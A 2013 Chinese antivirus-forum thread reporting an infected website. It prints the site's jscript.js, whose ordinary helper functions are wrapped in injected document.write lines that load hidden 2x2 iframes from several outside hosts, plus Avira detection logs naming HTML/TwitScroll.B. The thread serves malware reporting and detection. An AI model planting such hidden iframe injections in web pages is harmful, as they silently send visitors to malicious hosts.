查看: 1193|回复: 1
收起左侧

[已鉴定] 裏面

[复制链接]
fireold
发表于 2013-7-18 20:35:02 | 显示全部楼层 |阅读模式
  1. http://scottisharabianlink.com/infusions/aw_ecal_panel/calendar.php?cal=week
复制代码

  1. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://canadabook.ca/zmpu.html?j=846410></iframe>');

  2. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://wiltonct.us/ccpn.html?j=846410></iframe>');

  3. /*------------------------------------------
  4. Flipbox written by CrappoMan
  5. simonpatterson@dsl.pipex.com
  6. ------------------------------------------*/
  7. function flipBox(b) {
  8.     var a;
  9.     if (document.images["b_" + b].src.indexOf("_on") == -1) {
  10.         a = document.images["b_" + b].src.replace("_off", "_on");
  11.         document.getElementById("box_" + b).style.display = "none";
  12.         if (document.getElementById("box_" + b + "_diff")) {
  13.             document.getElementById("box_" + b + "_diff").style.display = "block"
  14.         }
  15.         document.images["b_" + b].src = a;
  16.         disply = "none";
  17.         now = new Date();
  18.         now.setTime(now.getTime() + 1000 * 60 * 60 * 24 * 365);
  19.         expire = (now.toGMTString());
  20.         document.cookie = "fusion_box_" + b + "=" + escape(disply) + "; expires=" + expire
  21.     } else {
  22.         a = document.images["b_" + b].src.replace("_on", "_off");
  23.         document.getElementById("box_" + b).style.display = "block";
  24.         if (document.getElementById("box_" + b + "_diff")) {
  25.             document.getElementById("box_" + b + "_diff").style.display = "none"
  26.         }
  27.         document.images["b_" + b].src = a;
  28.         disply = "block";
  29.         now = new Date();
  30.         now.setTime(now.getTime() + 1000 * 60 * 60 * 24 * 365);
  31.         expire = (now.toGMTString());
  32.         document.cookie = "fusion_box_" + b + "=" + escape(disply) + "; expires=" + expire
  33.     }
  34. }
  35. function addText(f, i, a, e) {
  36.     if (e == undefined) {
  37.         e = "inputform"
  38.     }
  39.     if (f == undefined) {
  40.         f = "message"
  41.     }
  42.     element = document.forms[e].elements[f];
  43.     element.focus();
  44.     if (document.selection) {
  45.         var c = document.selection.createRange();
  46.         var h = c.text.length;
  47.         c.text = i + c.text + a;
  48.         return false
  49.     } else {
  50.         if (element.setSelectionRange) {
  51.             var b = element.selectionStart,
  52.                 g = element.selectionEnd;
  53.             var d = element.scrollTop;
  54.             element.value = element.value.substring(0, b) + i + element.value.substring(b, g) + a + element.value.substring(g);
  55.             element.setSelectionRange(b + i.length, g + i.length);
  56.             element.scrollTop = d;
  57.             element.focus()
  58.         } else {
  59.             var d = element.scrollTop;
  60.             element.value += i + a;
  61.             element.scrollTop = d;
  62.             element.focus()
  63.         }
  64.     }
  65. }
  66. function insertText(f, h, e) {
  67.     if (e == undefined) {
  68.         e = "inputform"
  69.     }
  70.     if (document.forms[e].elements[f].createTextRange) {
  71.         document.forms[e].elements[f].focus();
  72.         document.selection.createRange().duplicate().text = h
  73.     } else {
  74.         if ((typeof document.forms[e].elements[f].selectionStart) != "undefined") {
  75.             var a = document.forms[e].elements[f];
  76.             var g = a.selectionEnd;
  77.             var d = a.value.length;
  78.             var c = a.value.substring(0, g);
  79.             var i = a.value.substring(g, d);
  80.             var b = a.scrollTop;
  81.             a.value = c + h + i;
  82.             a.selectionStart = c.length + h.length;
  83.             a.selectionEnd = c.length + h.length;
  84.             a.scrollTop = b;
  85.             a.focus()
  86.         } else {
  87.             document.forms[e].elements[f].value += h;
  88.             document.forms[e].elements[f].focus()
  89.         }
  90.     }
  91. }
  92. function show_hide(a) {
  93.     document.getElementById(a).style.display = document.getElementById(a).style.display == "none" ? "block" : "none"
  94. }
  95. function correctPNG() {
  96.     if (navigator.appName == "Microsoft Internet Explorer" && navigator.userAgent.indexOf("Opera") == -1) {
  97.         for (var g = 0; g < document.images.length; g++) {
  98.             var d = document.images[g];
  99.             var f = d.src.toUpperCase();
  100.             if (f.substring(f.length - 3, f.length) == "PNG") {
  101.                 var b = (d.id) ? "id='" + d.id + "' " : "";
  102.                 var e = (d.className) ? "class='" + d.className + "' " : "";
  103.                 var h = (d.title) ? "title='" + d.title + "' " : "title='" + d.alt + "' ";
  104.                 var c = "display:inline-block;" + d.style.cssText;
  105.                 if (d.align == "left") {
  106.                     c = "float:left;" + c
  107.                 }
  108.                 if (d.align == "right") {
  109.                     c = "float:right;" + c
  110.                 }
  111.                 if (d.parentElement.href) {
  112.                     c = "cursor:hand;" + c
  113.                 }
  114.                 var a = "<span " + b + e + h + ' style="width:' + d.width + "px; height:" + d.height + "px;" + c + ";filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + d.src + "', sizingMethod='scale');"></span>";
  115.                 d.outerHTML = a;
  116.                 g = g - 1
  117.             }
  118.         }
  119.     }
  120. }
  121. function getStyle(c, b) {
  122.     if (typeof c == "string") {
  123.         var a = document.getElementById(c)
  124.     } else {
  125.         var a = c
  126.     }
  127.     if (a.currentStyle) {
  128.         var d = a.currentStyle[b]
  129.     } else {
  130.         if (window.getComputedStyle) {
  131.             var d = document.defaultView.getComputedStyle(a, null).getPropertyValue(b)
  132.         }
  133.     }
  134.     return d
  135. };
  136. /***********************************************
  137. * Drop Down/ Overlapping Content- © Dynamic Drive (www.dynamicdrive.com)
  138. * This notice must stay intact for legal use.
  139. * Visit http://www.dynamicdrive.com/ for full source code
  140. ***********************************************/

  141. function getposOffset(a, d) {
  142.     var c = (d == "left") ? a.offsetLeft : a.offsetTop;
  143.     var b = a.offsetParent;
  144.     while (b != null) {
  145.         if (getStyle(b, "position") != "relative") {
  146.             c = (d == "left") ? c + b.offsetLeft : c + b.offsetTop
  147.         }
  148.         b = b.offsetParent
  149.     }
  150.     return c
  151. }
  152. function overlay(e, d, a) {
  153.     if (document.getElementById) {
  154.         var c = document.getElementById(d);
  155.         c.style.display = (c.style.display != "block") ? "block" : "none";
  156.         var b = getposOffset(e, "left") + ((typeof a != "undefined" && a.indexOf("right") != -1) ? -(c.offsetWidth - e.offsetWidth) : 0);
  157.         var f = getposOffset(e, "top") + ((typeof a != "undefined" && a.indexOf("bottom") != -1) ? e.offsetHeight : 0);
  158.         c.style.left = b + "px";
  159.         c.style.top = f + "px";
  160.         return false
  161.     } else {
  162.         return true
  163.     }
  164. }
  165. function overlayclose(a) {
  166.     document.getElementById(a).style.display = "none"
  167. }
  168. NewWindowPopUp = null;

  169. function OpenWindow(d, c, a, b) {
  170.     if (NewWindowPopUp != null) {
  171.         NewWindowPopUp.close();
  172.         NewWindowPopUp = null
  173.     }
  174.     if (b == false) {
  175.         wtop = 0;
  176.         wleft = 0
  177.     } else {
  178.         wtop = (screen.availHeight - a) / 2;
  179.         wleft = (screen.availWidth - c) / 2
  180.     }
  181.     NewWindowPopUp = window.open(d, "", "toolbar=no,menubar=no,location=no,personalbar=no,scrollbars=yes,status=no,directories=no,resizable=yes,height=" + a + ",width=" + c + ",top=" + wtop + ",left=" + wleft + "");
  182.     NewWindowPopUp.focus()
  183. }
  184. function resize_forum_imgs() {
  185.     var f;
  186.     var e;
  187.     if (self.innerWidth) {
  188.         e = self.innerWidth
  189.     } else {
  190.         if (document.documentElement && document.documentElement.clientWidth) {
  191.             e = document.documentElement.clientWidth
  192.         } else {
  193.             if (document.body) {
  194.                 e = document.body.clientWidth
  195.             } else {
  196.                 e = 1000
  197.             }
  198.         }
  199.     }
  200.     if (e <= 800) {
  201.         f = 200
  202.     } else {
  203.         if (e < 1152) {
  204.             f = 300
  205.         } else {
  206.             if (e >= 1152) {
  207.                 f = 400
  208.             }
  209.         }
  210.     }
  211.     for (var c = 0; c < document.images.length; c++) {
  212.         var b = document.images[c];
  213.         if (b.className != "forum-img") {
  214.             continue
  215.         }
  216.         var j = b.height;
  217.         var a = b.width;
  218.         var d = false;
  219.         if (a <= j) {
  220.             if (j > f) {
  221.                 b.height = f;
  222.                 b.width = a * (f / j);
  223.                 d = true
  224.             }
  225.         } else {
  226.             if (a > f) {
  227.                 b.width = f;
  228.                 b.height = j * (f / a);
  229.                 d = true
  230.             }
  231.         }
  232.         var h = b.parentNode;
  233.         var g = h.parentNode;
  234.         if (h.className != "forum-img-wrapper") {
  235.             continue
  236.         }
  237.         if (d) {
  238.             h.style.display = "inline";
  239.             if (g.tagName != "A") {
  240.                 h.onclick = new Function("OpenWindow('" + b.src + "', " + (a + 40) + ", " + (j + 40) + ", true)");
  241.                 h.onmouseover = "this.style.cursor='pointer'"
  242.             }
  243.         } else {
  244.             h.style.display = "inline"
  245.         }
  246.     }
  247.     return true
  248. }
  249. function onload_events() {
  250.     resize_forum_imgs();
  251.     correctPNG()
  252. }
  253. window.onload = onload_events;
  254. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozgn.html></iframe>');
  255. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=846410></iframe>');
复制代码


  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://assessor.com/oapu.html?j=846410>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://canadabook.ca/zmpu.html?j=846410>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://nasaspinesurgeons.com/hzgu.html?i=846410>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://recoveryventurescorp.org/ozgn.html>
  3. </iframe>
复制代码

  1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
  2. width=2 src=http://wiltonct.us/ccpn.html?j=846410>
  3. </iframe>
复制代码



Avira
2013/7/18 下午 08:31 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jscript[1].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作:
      檔案會移動至 '541a4f5e.qua' 名稱底下的隔離區目錄。.

2013/7/18 下午 08:31 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\jquery[4].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作:
      檔案會移動至 '4c9b60e7.qua' 名稱底下的隔離區目錄。.

2013/7/18 下午 08:31 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        769
      目錄數:        0
      惡意程式碼數:        2
      警告數:        0

2013/7/18 下午 08:31 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\jquery[4].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:傳輸至掃描程式

2013/7/18 下午 08:31 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jscript[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:傳輸至掃描程式

2013/7/18 下午 08:31 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\jquery[4].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作:拒絕存取

2013/7/18 下午 08:31 [Web Protection] 發現惡意程式碼
      從 URL "http://scottisharabianlink.com/includes/jquery/jquery.js" 存取資料時,
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作:已略過

2013/7/18 下午 08:31 [Web Protection] 發現惡意程式碼
      從 URL "http://scottisharabianlink.com/includes/jscript.js" 存取資料時,
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作:已略過


fs16.jpg
释然的心
发表于 2013-7-19 22:38:08 | 显示全部楼层
2013-7-19 22:36:57        恶意HTTP对象 <ht tp://scottisharabianlink.com/includes/jscript.js>:被阻止的访问。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 20:51 , Processed in 0.130217 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表